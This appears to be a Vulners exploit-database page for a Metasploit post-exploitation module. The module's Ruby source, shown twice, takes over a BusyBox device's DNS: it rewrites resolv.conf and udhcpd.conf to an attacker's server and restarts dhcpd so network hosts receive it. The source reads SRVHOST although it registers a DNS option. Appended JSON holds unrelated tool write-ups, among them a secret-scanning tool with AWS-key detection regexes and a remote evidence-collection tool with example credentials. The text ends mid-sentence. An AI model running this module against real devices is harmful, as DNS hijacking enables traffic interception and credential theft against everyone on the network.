Search...

BusyBox DNS Configuration

2015-08-28T14:17:23

ID MSF:POST/LINUX/BUSYBOX/SET_DNS
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module will be applied on a session connected to a BusyBox shell. It allows to set the DNS server on the device executing BusyBox so it will be sent by the DHCP server to network hosts.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::BusyBox

  def initialize
    super(
      'Name'         =&gt; 'BusyBox DNS Configuration',
      'Description'  =&gt; %q{
        This module will be applied on a session connected to a BusyBox shell. It allows
        to set the DNS server on the device executing BusyBox so it will be sent by the
        DHCP server to network hosts.
      },
      'Author'       =&gt; 'Javier Vicente Vallejo',
      'License'      =&gt; MSF_LICENSE,
      'Platform'      =&gt; ['linux'],
      'SessionTypes'  =&gt; ['shell']
    )

    register_options(
      [
        OptAddress.new('DNS',   [ true, 'The dns server address' ])
      ])
  end

  def run
    print_status("Searching for files to modify dns server.")
    if busy_box_file_exist?('/etc/resolv.conf')
      modify_resolv_conf
    end

    if busy_box_file_exist?('/etc/udhcpd.conf')
      modify_udhcpd_conf
    end
  end

  def modify_resolv_conf
    print_status('File /etc/resolv.conf found')
    if busy_box_write_file('/etc/resolv.conf', "nameserver #{datastore['SRVHOST']}", false)
      print_good('DNS server added to resolv.conf')
    end
  end

  def modify_udhcpd_conf
    print_status('File /etc/udhcpd.conf found')

    if busy_box_write_file('/etc/udhcpd.conf', "option dns #{datastore['SRVHOST']}", true)
      restart_dhcpd('/etc/udhcpd.conf')
    else
      print_status('Unable to write udhcpd.conf, searching a writable directory...')
      writable_directory = busy_box_writable_dir
      if writable_directory
        print_status("Copying the original udhcpd.conf to #{writable_directory}tmp.conf")
        cmd_exec("cp -f /etc/udhcpd.conf #{writable_directory}tmp.conf")
        Rex::sleep(0.3)
        print_status("Adding DNS to #{writable_directory}tmp.conf")
        busy_box_write_file("#{writable_directory}tmp.conf", "option dns #{datastore['SRVHOST']}", true)
        restart_dhcpd("#{writable_directory}tmp.conf")
      else
        print_error('Writable directory not found')
      end
    end
  end

  def restart_dhcpd(conf)
    print_status('Restarting udhcp server')
    cmd_exec('killall dhcpd')
    # in this case it is necessary to use shell_write. Cmd_exec introduce an echo after the command
    # that is going to be executed: &lt;command&gt;;echo &lt;rand_value&gt;. It seems busybox fails to launch dhcpd
    # process when it is executed in this way: "dhcpd /etc/udhcpd.conf &; echo &lt;rand_value&gt;"
    session.shell_write("dhcpd #{conf} &\n")
    print_good('udhcpd.conf modified and DNS server added. DHCPD restarted')
  end
end

JSON Vulners Source

Initial Source

{"id": "MSF:POST/LINUX/BUSYBOX/SET_DNS", "type": "metasploit", "bulletinFamily": "exploit", "title": "BusyBox DNS Configuration", "description": "This module will be applied on a session connected to a BusyBox shell. It allows to set the DNS server on the device executing BusyBox so it will be sent by the DHCP server to network hosts.\n", "published": "2015-08-28T14:17:23", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-12-28T15:20:29", "viewCount": 165, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2019-12-28T15:20:29", "rev": 2}, "dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-23836"]}, {"type": "redhat", "idList": ["RHSA-2020:2774", "RHSA-2020:2783", "RHSA-2020:2777", "RHSA-2020:2779", "RHSA-2020:2592", "RHSA-2020:2780", "RHSA-2020:2773", "RHSA-2020:2770", "RHSA-2020:2781"]}, {"type": "exploitdb", "idList": ["EDB-ID:48629"]}, {"type": "talos", "idList": ["TALOS-2020-1088"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158245", "PACKETSTORM:158266", "PACKETSTORM:158261"]}, {"type": "kitploit", "idList": ["KITPLOIT:1333834857311360725"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892262"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2020-2768.NASL", "REDHAT-RHSA-2020-2755.NASL"]}], "modified": "2019-12-28T15:20:29", "rev": 2}, "vulnersScore": 0.4}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/busybox/set_dns.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::BusyBox\n\n def initialize\n super(\n 'Name' => 'BusyBox DNS Configuration',\n 'Description' => %q{\n This module will be applied on a session connected to a BusyBox shell. It allows\n to set the DNS server on the device executing BusyBox so it will be sent by the\n DHCP server to network hosts.\n },\n 'Author' => 'Javier Vicente Vallejo',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell']\n )\n\n register_options(\n [\n OptAddress.new('DNS', [ true, 'The dns server address' ])\n ])\n end\n\n def run\n print_status(\"Searching for files to modify dns server.\")\n if busy_box_file_exist?('/etc/resolv.conf')\n modify_resolv_conf\n end\n\n if busy_box_file_exist?('/etc/udhcpd.conf')\n modify_udhcpd_conf\n end\n end\n\n def modify_resolv_conf\n print_status('File /etc/resolv.conf found')\n if busy_box_write_file('/etc/resolv.conf', \"nameserver #{datastore['SRVHOST']}\", false)\n print_good('DNS server added to resolv.conf')\n end\n end\n\n def modify_udhcpd_conf\n print_status('File /etc/udhcpd.conf found')\n\n if busy_box_write_file('/etc/udhcpd.conf', \"option dns #{datastore['SRVHOST']}\", true)\n restart_dhcpd('/etc/udhcpd.conf')\n else\n print_status('Unable to write udhcpd.conf, searching a writable directory...')\n writable_directory = busy_box_writable_dir\n if writable_directory\n print_status(\"Copying the original udhcpd.conf to #{writable_directory}tmp.conf\")\n cmd_exec(\"cp -f /etc/udhcpd.conf #{writable_directory}tmp.conf\")\n Rex::sleep(0.3)\n print_status(\"Adding DNS to #{writable_directory}tmp.conf\")\n busy_box_write_file(\"#{writable_directory}tmp.conf\", \"option dns #{datastore['SRVHOST']}\", true)\n restart_dhcpd(\"#{writable_directory}tmp.conf\")\n else\n print_error('Writable directory not found')\n end\n end\n end\n\n def restart_dhcpd(conf)\n print_status('Restarting udhcp server')\n cmd_exec('killall dhcpd')\n # in this case it is necessary to use shell_write. Cmd_exec introduce an echo after the command\n # that is going to be executed: <command>;echo <rand_value>. It seems busybox fails to launch dhcpd\n # process when it is executed in this way: \"dhcpd /etc/udhcpd.conf &; echo <rand_value>\"\n session.shell_write(\"dhcpd #{conf} &\\n\")\n print_good('udhcpd.conf modified and DNS server added. DHCPD restarted')\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}

{"kitploit": [{"lastseen": "2021-02-28T15:38:09", "bulletinFamily": "tools", "cvelist": [], "description": "[ ![](https://1.bp.blogspot.com/--3Admoa99yk/YDSYFn648AI/AAAAAAAAVco/yY0lBQ_BVJwYn6lXPyPAF1rVDSwLTPqLgCNcBGAsYHQ/s0/gargamel_1_logo.png) ](<https://1.bp.blogspot.com/--3Admoa99yk/YDSYFn648AI/AAAAAAAAVco/yY0lBQ_BVJwYn6lXPyPAF1rVDSwLTPqLgCNcBGAsYHQ/s300/gargamel_1_logo.png>)\n\n \n\n\nA Forensic Evidence Acquirer \n\n \n\n\n** Compile ** \n\n\nAssuming you have Rust 1.41+ installed. Open terminal in the project directory and to compile a release build type \n \n \n cargo build --release\n\nDebug build can be compiled using \n \n \n cargo build\n\nCompiled executable is located at ` target/release/gargamel.exe ` or ` target/debug/gargamel.exe ` , respectively. \n\n \n** Set log level ** \n\n\nIf you wish to change the logging level: \n\n * Open ` src/main.rs `\n * On lines 42 and 43 change ` LevelFilter::Info ` to (for example) ` LevelFilter::Trace ` for more detailed logging. \n * Beware that the ` LevelFilter::Trace ` will log everything including passwords. \n \n** User guide ** \n\n\nRight now, this app works only on Windows and the target computer must use Windows or Linux. \n\nMake sure to have the following programs in the same directory as Gargamel. \n\n * ` psexec ` , [ download ](<https://docs.microsoft.com/en-us/sysinternals/downloads/psexec> \"download\" )\n * ` paexec ` , an open source alternative to PsExec, [ download ](<https://www.poweradmin.com/paexec/> \"download\" )\n * ` winpmem ` , an open source memory image tool, [ download ](<https://github.com/Velocidex/c-aff4/releases> \"download\" ) . \n * Download the newest executable and rename it to _ winpmem.exe _\n * ` plink ` and ` pscp ` , an open source CLI SSH/SCP clients, [ download ](<https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html> \"download\" )\n * ` SharpRDP ` , an open source command executor using RDP, [ download ](<https://github.com/vildibald/SharpRDP/releases/tag/v1.0.0> \"download\" )\n * ` WMImplant ` , as open source [ PowerShell ](<https://www.kitploit.com/search/label/PowerShell> \"PowerShell\" ) WMI command executor, [ download ](<https://github.com/vildibald/WMImplant> \"download\" )\n * ` 7za.exe ` , a standalone console version of 7zip archiver, [ download ](<https://www.7-zip.org/download.html> \"download\" )\n\nNote: We need both the ` psexec ` and ` paexec ` . Although both applications are supposed to be functionally equivalent they actually both have different behavior under some circumstances. \n\n \n** Unleashing the power of Gargamel ** \n\n\nGargamel needs to be launched from an elevated terminal to be fully functional. Currently it does not support the UAC dialog nor any kind of notification when running with limited privileges. When running with limited user privileges, then some [ operations ](<https://www.kitploit.com/search/label/Operations> \"operations\" ) like target memory dumping will not work. \n\n \n** Basic example ** \n\n\nAssume you want to connect to a computer with the following parameters: \n\n * address ` 192.168.42.47 `\n * username ` Jano `\n * password ` nbusr123 `\n\nThe following command will acquire firewall state, network state, logged users, running processes, active network connections, registry, system & application event logs using PsExec method. Evidence will be stored in the ` testResults ` directory relative to the location of Gargamel. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults\n\nGargamel will ask you for password of the remote user, in our example the password is ` nbusr123 ` . Note that password will be hidden when typing. \n\nIt is also possible to specify the password directly as program argument. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -p nbusr123 -o testResults\n\n \n** Domain example ** \n\n\nAssume you want to connect to a computer in a domain with the following parameters: \n\n * domain ` WORKSPACE `\n * computer name ` JanovPC `\n * username ` Jano `\n * password ` nbusr123 `\n\nThe following command will acquire firewall state, network state, logged users, running processes, active network connections, registry, system & application event logs using PsExec method. \n \n \n gargamel.exe -c JanovPC -u Jano -d WORKSPACE --psexec -o testResults\n\nOr to skip password prompting specify the password directly. \n \n \n gargamel.exe -c JanovPC -u Jano -d WORKSPACE --psexec -p nbusr123 -o testResults\n\n \n** Other connection methods ** \n\n\nPsExec is one of the 5 supported connection methods. You can replace the ` --psexec ` with the following options: \n\n * ` --psexec `\n * ` --psrem ` , if PowerShell remoting is configured on target machine. \n * ` --rdp ` , if RDP is enabled on target machine. \n * ` --wmi ` . \n * ` --ssh ` , if target machine uses Linux. \n\nIt is possible to use several methods at once. For example to use both PsExec and RDP one can use the following command. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec --rdp -o testResults\n\nThere is also a special switch ` --all ` that is equal to specifying ` --psexec --rdp --psrem --wmi ` . \n\nNote: Launch parameters are order-agnostic, i.e. it does not matter in which order the parameters are specified. \n\n \n** Acquire memory ** \n\n\nTo acquire also memory dump, then simply add the ` -m ` flag to the program parameters, i.e. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -m\n\nIf you wish to acquire ONLY the memory dump without other evidence then use the following command. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -m --no-events-search --no-evidence-search --no-registry-search \n\nThis functionality is available only for Windows targets. \n\n \n** Run custom commands ** \n\n\nGargamel may run custom Windows CMD or Linux shell commands on remote machine. \n\nFirst create a file ` custom-commands.txt ` with the following content. \n \n \n # Will be run using any method \n ipconfig \n # Will run only when launching with at least one of --all, --psexec, --wmi methods \n :psexec:wmi ipconfig -all\n\nResults of the above commands will be stored in the directory specified by ` -o ` option. \n\nTo run the above commands written in ` custom-commands.txt ` use the ` -e ` switch, i.e. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -e custom-commands.txt \n\n \n** Download custom files ** \n\n\nGargamel is able to download remote files. \n\nFirst create a file ` custom-files.txt ` with the following content. \n \n \n C:\\Users\\Public\\sss* \n C:\\Users\\Jano\\danove.pdf \n # This line and the next one will be ignored \n # C:\\Users\\Jano\\somBajecny.pptx \n\n \n** Note: Wildcards * and ? are supported but currently only in filenames, not parent directories, i.e. C:\\Users\\J*\\danove.pdf will most likely not work. ** \n\n\nResults of the above commands will be stored in the directory specified by ` -o ` option. \n\nTo run the above commands written in ` custom-files.txt ` use the ` -s ` switch, i.e. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -s custom-files.txt \n\n \n** All options ** \n\n\nAll supported switches are described below. \n \n \n USAGE: \n gargamel.exe [FLAGS] [OPTIONS] --user <user> \n \n FLAGS: \n -a, --all Acquire evidence from Windows machine using all supported methods (PsExec, PsRemote, \n WMI, RDP). \n --no-events-search Disables Windows event logs acquisition. \n --no-evidence-search Disables acquisition of evidence that can be usually downloaded quickly (like ipconfig, \n firewall status etc..) \n --no-registry-search Disables target registry acquisition. \n -h, --help Prints help information \n -m, --mem-image Optional: Memory dump of a target Windows machine. \n --local Acquire evidence from local machine. \n --nla Optional: Use network level authentication when using RDP. (Windows targets only) \n --no-7z Optional: Disable 7zip c ompression for registry & memory images.This will significantly \n decrease the running time, but WMI and RDP connections will probably not work properly. \n (Windows targets only) \n --psexec Acquire evidence from Windows machine using PsExec. Requires both PsExec64.exe and \n paexec.exe in the current directory or in the path. \n --psrem Acquire evidence from Windows machine using PowerShell. Requires both PsExec64.exe and \n paexec.exe in the current directory or in the path. \n --rdp Acquire evidence from Windows machine using RDP. Requires SharpRDP.exe in the current \n directory or in the path. \n --ssh Acquire evidence from Linux machine using SSH. Requires both plink.exe and pscp.exe in \n the current directory or in the path. \n -V, --version Prints version information \n --wmi Acquire evidence from Windows machine using WMI. Requires WMImplant.ps1 in the current \n directory or in the path and PowerShell 3.0+ on the host machine.Note: It is necessary \n to disable [Windows Defender](<https://www.kitploit.com/search/label/Windows%20Defender> \"Windows Defender\" ) real-time [protection](<https://www.kitploit.com/search/label/Protection> \"protection\" ) (other AVs not tested). \n \n OPTIONS: \n -c, --computer <computer> Remote computer address/name. [default: 127.0.0.1] \n -u, --user <user> Remote user name \n -d, --domain <domain> Optional: Remote Windows domain \n -o, --output <local-store-directory> \n Name of local directory to store the evidence [default: evidence-output] \n \n -p, --password <password> \n Optional: Remote user password. Skipping this option will prompt a possibility to put a password in hidden \n way.To specify an empty password use `-p \"\"` \n \n --redownload <re-download> \n Optional: Download and DELETE specified file from target computer. Use this in case of previous failed \n partially completed operation. For just downloading a file (without deleting it) please use a `search` \n switch. If you specify a 7zip chunk (.7z.[chunk-number], e.g. .7z.004), then it will also automatically try to \n download subsequent chunks.Use also with --psexec --psrem, --rdp, --wmi, --all \n \n -r, --remote-storage <remote-store-directory> \n Name of [remote directory](<https://www.kitploit.com/ search/label/Remote%20Directory> \"remote directory\" ) to be used as a temporary storage. (Windows targets only) [default: \n C:\\Users\\Public] \n \n -e, --commands <custom-command-path> Optional: File with custom commands to execute on remote computer \n \n -s, --search <search-files-path> \n Optional: File with files names to be searched on remote computer. File names supports also `*` and `?` \n wildcards on file names (but not yet parent directories). \n \n --key <ssh-key> Optional: Name/path of SSH private key file. (Linux target only) \n \n --timeout <timeout> \n Optional: Timeout in seconds for long running operations.This option is a workaround for a bug in \n WMImplant.ps1 amd SharpRDP.exe where finishing of a long running operation cannot sometimes properly close \n the connection leaving the Gargamel in seemingly frozen state or executing the next operation with the \n previous one unfinished on target site.Increasing this timeout may solve issues when acquiring registry or \n memory image from target machine. [default: 300] \n \n\n \n** Known issues ** \n\n\n * WMI cannot write its output to file with symbol ` _ ` in its path/name. \n \n \n\n\n** [ Download Gargamel ](<https://github.com/Lifars/gargamel> \"Download Gargamel\" ) **\n", "edition": 1, "modified": "2021-02-28T11:30:02", "published": "2021-02-28T11:30:02", "id": "KITPLOIT:6715981344528147603", "href": "http://www.kitploit.com/2021/02/gargamel-forensic-evidence-acquirer.html", "title": "Gargamel - A Forensic Evidence Acquirer", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-28T01:35:17", "bulletinFamily": "tools", "cvelist": [], "description": "[ ![](https://1.bp.blogspot.com/-ZWk2fsNEijY/YDSXFqWl0QI/AAAAAAAAVcg/iFebecVmdP41ncNbc9fkh4kDKrkSPKwFACNcBGAsYHQ/w640-h574/pillager_1_brand_image_ice.png) ](<https://1.bp.blogspot.com/-ZWk2fsNEijY/YDSXFqWl0QI/AAAAAAAAVcg/iFebecVmdP41ncNbc9fkh4kDKrkSPKwFACNcBGAsYHQ/s1752/pillager_1_brand_image_ice.png>)\n\n \n\n\nPillager is designed to provide a simple means of leveraging Go's strong concurrency model to recursively search directories for [ sensitive information ](<https://www.kitploit.com/search/label/Sensitive%20Information> \"sensitive information\" ) in files. Pillager does this by standing on the shoulders of [ a few giants ](<https://github.com/brittonhayes/pillager#shoulders-of-giants> \"a few giants\" ) . Once pillager finds files that match the specified pattern, the file is scanned using a series of concurrent workers that each take a line of the file from the job queue and hunt for sensitive pattern matches. The available pattern filters can be defined in a rules.toml file or you can use the default ruleset. \n\n \n\n\n** Installation ** \n \n** Go ** \n\n\nIf you have Go setup on your system, you can install Pillager with ` go get `\n \n \n go get github.com/brittonhayes/pillager\n\n \n** Scoop (Windows) ** \n\n \n \n scoop bucket add pillager https://github.com/brittonhayes/pillager-scoop.git \n scoop install pillager\n\n \n** Homebrew (OSX/Linux) ** \n\n \n \n brew tap brittonhayes/homebrew-pillager \n brew install pillager\n\nIf you're looking for a binary, check the latest releases for the executable that matches your system \n\n \n** Usage ** \n\n\nTo see all the commands available with ` pillager `\n \n \n # To see instructions for the entire application \n pillager \n \n # From any subcommand \n pillager [cmd] --help\n\n \n** Configuration ** \n \n** Gitleaks Rules ** \n\n\nPillager provides full support for [ Gitleaks ](<https://github.com/zricethezav/gitleaks> \"Gitleaks\" ) rules. This can either be passed in with a [ rules.toml ](<https://github.com/brittonhayes/pillager/blob/main/rules.toml> \"rules.toml\" ) file, or you can use the default ruleset by leaving the rules flag blank. \n \n \n # rules.toml \n title = \"pillager rules\" \n \n [[rules]] \n description = \"AWS Access Key\" \n regex = '''(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}''' \n tags = [\"key\", \"AWS\"] \n [[rules.entropies]] \n Min = \"3.5\" \n Max = \"4.5\" \n Group = \"1\" \n \n [[rules]] \n description = \"Email Address\" \n regex = '''(?i)([A-Za-z0-9!#$%&'*+\\/=?^_{|.}~-][email\u00a0protected](?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)''' \n tags = [\"email\", \"User Info\"]\n\n \n** Custom Templates ** \n\n\nPillager allows you to use powerful ` go text/template ` to customize the output format. Here are a few template examples. \n\n \n** Basic ** \n\n \n \n {{/*basic.tmpl*/}} {{ range .Leaks}} Leak: {{.Line}} Line: {{.LineNumber}} File: {{ .File }} {{end}} \n\n \n** Markdown Styling ** \n\n \n \n {{/*markdown.tmpl*/}} # Results {{ range .Leaks}} ## {{ .File }} - Location: {{.LineNumber}} {{end}} \n\n \n** Documentation ** \n\n\n\uf4da \n\n[ View the docs ](<https://github.com/brittonhayes/pillager/blob/main/hunter> \"View the docs\" )\n\nGoDoc documentation is available on [ pkg.go.dev for pillager ](<https://pkg.go.dev/github.com/brittonhayes/pillager> \"pkg.go.dev for pillager\" ) but it also available for all packages in the [ ./pkg ](<https://github.com/brittonhayes/pillager/blob/main/pkg> \"./pkg\" ) directory. Just open the folder of any package, and you'll see the GoDocs rendered in beautiful Github-flavored markdown thanks to the awesome [ gomarkdoc ](<https://github.com/princjef/gomarkdoc> \"gomarkdoc\" ) tool. \n\n \n** Shoulders of Giants \n\n \n\n\n** ** [ afero's Cobra ](<https://github.com/spf13/cobra> \"afero's Cobra\" ) ** \n\n\n** What is Cobra? **\n\n> Cobra is a [ library ](<https://www.kitploit.com/search/label/Library> \"library\" ) providing a simple interface to create powerful modern CLI interfaces similar to git & go tools. Cobra is also an application that will generate your application scaffolding to rapidly develop a Cobra-based application. \n\nIf you've seen a CLI written in Go before, there's a pretty high chance it was built with Cobra. I can't recommend this library enough. It empowers developers to make consistent, dynamic, and self-documenting [ command line ](<https://www.kitploit.com/search/label/Command%20Line> \"command line\" ) tools with ease. Some examples include ` kubectl ` , ` hugo ` , and Github's ` gh ` CLI. \n\n \n** [ Gitleaks ](<https://github.com/zricethezav/gitleaks> \"Gitleaks\" ) ** \n\n\n** What is Gitleaks? **\n\n> Gitleaks is a SAST tool for detecting hardcoded secrets like passwords, api keys, and tokens in git repos. \n\nGitleaks is an amazing tool for secret leak prevention. If you haven't implemented [ Gitleaks ](<https://www.kitploit.com/search/label/Gitleaks> \"Gitleaks\" ) as a pre-commit checker, it's worth your time to check it out. \n\n** Why is Gitleaks relevant to Pillager? **\n\nPillager implements the powerful [ rules ](<https://github.com/zricethezav/gitleaks#rules-summary> \"rules\" ) functionality of Gitleaks while taking a more offensive approach to working with the secrets found. While I have provided a baseline set of default rules, Pillager becomes much more powerful if you allow users to create rules for their own use-cases. \n\n> This goes without saying but I'm going to say it anyways: I am ** not ** responsible for any repercussions caused by your use of pillager. This tool is intended for defensive, [ Blue Team ](<https://www.kitploit.com/search/label/Blue%20Team> \"Blue Team\" ) use. \n\n \n \n\n\n** [ Download Pillager ](<https://github.com/brittonhayes/pillager> \"Download Pillager\" ) **\n", "edition": 1, "modified": "2021-02-27T20:30:11", "published": "2021-02-27T20:30:11", "id": "KITPLOIT:7351222972556330399", "href": "http://www.kitploit.com/2021/02/pillager-filesystems-for-sensitive.html", "title": "Pillager - Filesystems For Sensitive Information With Go", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-27T15:36:38", "bulletinFamily": "tools", "cvelist": [], "description": "[ ![](https://1.bp.blogspot.com/-j6qJf4KVxis/YDSWmqHjkMI/AAAAAAAAVcY/M87B9bvR-hYw9laisRtIX0kwA3Nfo6atACNcBGAsYHQ/w640-h378/DDoS%2BProtection.png) ](<https://1.bp.blogspot.com/-j6qJf4KVxis/YDSWmqHjkMI/AAAAAAAAVcY/M87B9bvR-hYw9laisRtIX0kwA3Nfo6atACNcBGAsYHQ/s808/DDoS%2BProtection.png>)\n\n \n\n\nGatekeeper is the first open source DoS [ protection ](<https://www.kitploit.com/search/label/Protection> \"protection\" ) system. It is designed to scale to any peak bandwidth, so it can withstand DoS attacks both of today and of tomorrow. In spite of the geographically [ distributed ](<https://www.kitploit.com/search/label/Distributed> \"distributed\" ) architecture of Gatekeeper, the network policy that describes all decisions that have to be enforced on the incoming [ traffic ](<https://www.kitploit.com/search/label/Traffic> \"traffic\" ) is centralized. This centralized policy enables network operators to leverage distributed algorithms that would not be viable under very high latency (e.g. distributed databases) and to fight multiple multi-vector DoS attacks at once. \n\nThe intended users of Gatekeeper are network operators of institutions, service and content providers, enterprise networks, etc. It is not intended to be used by individual Internet users. \n\nFor more information, see the [ Gatekeeper wiki ](<https://github.com/AltraMayor/gatekeeper/wiki> \"Gatekeeper wiki\" ) . \n\n \n\n\n** How to Set Up ** \n \n** Configure Hugepages ** \n\n\nDPDK requires the use of hugepages; instructions for mounting hugepages are available in the [ requirements documentation ](<http://doc.dpdk.org/guides/linux_gsg/sys_reqs.html#use-of-hugepages-in-the-linux-environment> \"requirements documentation\" ) . On many systems, the following hugepages setup is sufficient: \n \n \n $ echo 256 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages \n \n\n \n** Option 1: Obtain Packages ** \n\n\nDebian packages for Gatekeeper are available at the project's [ Releases ](<https://github.com/AltraMayor/gatekeeper/releases> \"Releases\" ) page. \n\n \n** Install ** \n\n\nOnce the packages are downloaded, they can be installed with the commands below: \n \n \n $ tar -zxvf gatekeeper-ubuntu-18.04-packages.tar.gz \n $ cd gatekeeper-ubuntu-18.04-packages \n $ sudo dpkg -i libgkrte-*.deb \\ \n libgkdpdk-dev_*_amd64.deb \\ \n gatekeeper-dpdk_*_amd64.deb \\ \n gatekeeper-dpdk-dev_*_amd64.deb \\ \n gatekeeper-dpdk-igb-uio-dkms_*_amd64.deb \\ \n gatekeeper-dpdk-rte-kni-dkms_*_amd64.deb \\ \n gatekeeper-bird_*_amd64.deb \\ \n gatekeeper_*_amd64.deb \n \n\nThe ` gatekeeper-dpdk-dev ` package is a dependency of the DKMS packages, which build their respective kernel modules during package installation and kernel upgrades. \n\n \n** Configure Network Adapters ** \n\n\nEdit the ` /etc/gatekeeper/envvars ` file and insert names of the network adapters to be bound to DPDK. For example: \n \n \n GATEKEEPER_INTERFACES=\"eth0 eth1\" \n \n\nAlternatively, the interfaces' PCI addresses can be specified: \n \n \n GATEKEEPER_INTERFACES=\"0000:00:07.0 0000:00:08.0\" \n \n\nIn the same file, you can optionally specify [ Environmental Abstraction Layer options ](<https://doc.dpdk.org/guides/linux_gsg/linux_eal_parameters.html> \"Environmental Abstraction Layer options\" ) in the ` DPDK_ARGS ` variable and [ Gatekeeper-specific options ](<https://github.com/AltraMayor/gatekeeper/wiki/Configuration#application-configuration> \"Gatekeeper-specific options\" ) in ` GATEKEEPER_ARGS ` . \n\n \n** How to run ** \n\n\nRun the commands below to start Gatekeeper and to ensure it is started automatically on reboots. \n \n \n $ sudo systemctl start gatekeeper \n $ sudo systemctl enable gatekeeper \n \n\n \n** Option 2: Build from Source ** \n \n** Install Dependencies ** \n\n\nInstall the following software dependencies: \n \n \n $ sudo apt-get update \n $ sudo apt-get -y -q install git clang devscripts doxygen hugepages \\ \n build-essential linux-headers-`uname -r` libmnl0 libmnl-dev \\ \n libkmod2 libkmod-dev libnuma-dev libelf1 libelf-dev libc6-dev-i386 \\ \n autoconf flex bison libncurses5-dev libreadline-dev \n \n\nNote: Both ` libmnl0 ` and ` libmnl-dev ` are needed to compile and run ` gatekeeper ` , but only ` libmnl0 ` is needed for simply running ` gatekeeper ` . Both ` libkmod2 ` and ` libkmod-dev ` are needed to compile and run ` gatekeeper ` , but only ` libkmod2 ` is needed for simply running ` gatekeeper ` . ` libnuma-dev ` is needed to compile the latest DPDK and to support NUMA systems. The package ` libelf-dev ` is needed to compile DPDK with support to reading BPF programs from ELF files, but only ` libelf1 ` is needed to run it. The package ` libc6-dev-i386 ` is needed to compile the BPF programs in the folder ` bpf/ ` . The ` autoconf ` , ` flex ` , ` bison ` , ` libncurses5-dev ` , and ` libreadline-dev ` packages are for BIRD. The ` devscripts ` package is used to build Gatekeeper [ Debian ](<https://www.kitploit.com/search/label/Debian> \"Debian\" ) packages. \n\nTo use DPDK, make sure you have all of the [ environmental requirements ](<http://dpdk.org/doc/guides/linux_gsg/sys_reqs.html#running-dpdk-application> \"environmental requirements\" ) . \n\n \n** Clone Repository ** \n\n\nClone the Gatekeeper repository, including the submodules that contain Gatekeeper dependencies: \n \n \n $ git clone --recursive http://github.com/AltraMayor/gatekeeper.git \n \n\nIf you do not use the ` --recursive ` clone option, you need to obtain the submodules that contain the dependences from within the ` gatekeeper ` directory: \n \n \n $ git submodule init \n $ git submodule update \n \n\n \n** Compile ** \n\n\nThis section explains how to build Gatekeeper manually. If you want to build Debian packages, refer to the section [ How to build packages ](<https://github.com/AltraMayor/gatekeeper#how-to-build-packages> \"How to build packages\" ) . \n\nWhile in the ` gatekeeper ` directory, run the setup script: \n \n \n $ . setup.sh \n \n\nThis script compiles DPDK, LuaJIT, and BIRD, and loads the needed kernel modules. Additionally, it saves the interface names and their respective PCI addresses in the file ` lua/if_map.lua ` so that interface names can be used in the Gatekeeper configuration files. \n\nIt also sets two environmental variables: ` RTE_SDK ` and ` RTE_TARGET ` . They must be set before ` gatekeeper ` will compile. \n\nAfter running the setup script, you may want to save the environmental variables in your shell's preferences file. For example, in Bash, you can do: \n \n \n $ echo \"export RTE_SDK=${RTE_SDK}\" >> ${HOME}/.profile \n $ echo \"export RTE_TARGET=${RTE_TARGET}\" >> ${HOME}/.profile \n \n\nOtherwise, each time you login you will need to set these environmental variables again. \n\nOnce DPDK is compiled and the variables are set, ` gatekeeper ` can be compiled: \n \n \n $ make \n \n\n \n** Configure Network Adapters ** \n\n\nBefore ` gatekeeper ` can be used, the network adapters must be bound to DPDK. For this, you can use the script ` dependencies/dpdk/usertools/dpdk-devbind.py ` . For example: \n \n \n $ sudo dependencies/dpdk/usertools/dpdk-devbind.py --bind=uio_pci_generic enp131s0f0 \n \n\nThis command binds the interface ` enp131s0f0 ` to the ` uio_pci_generic ` driver so that frames can be passed directly to DPDK instead of the kernel. Note that this binding must take place after Gatekeeper is setup in the steps above so that the bound interface appears in the list of interfaces in ` lua/if_map.lua ` . \n\n \n** How to Run ** \n\n\nOnce ` gatekeeper ` is compiled and the environment is configured correctly, run: \n \n \n $ sudo build/gatekeeper [EAL OPTIONS] -- [GATEKEEPER OPTIONS] \n \n\nWhere ` [EAL OPTIONS] ` are specified before a double dash and represent the parameters for DPDK's [ Environmental Abstraction Layer ](<https://doc.dpdk.org/guides/linux_gsg/linux_eal_parameters.html> \"Environmental Abstraction Layer\" ) and ` [GATEKEEPER OPTIONS] ` are specified after the double dash and represent [ Gatekeeper-specific options ](<https://github.com/AltraMayor/gatekeeper/wiki/Configuration#application-configuration> \"Gatekeeper-specific options\" ) . \n\nThe early configuration of the system, including device and memory configuration in DPDK, will be logged to 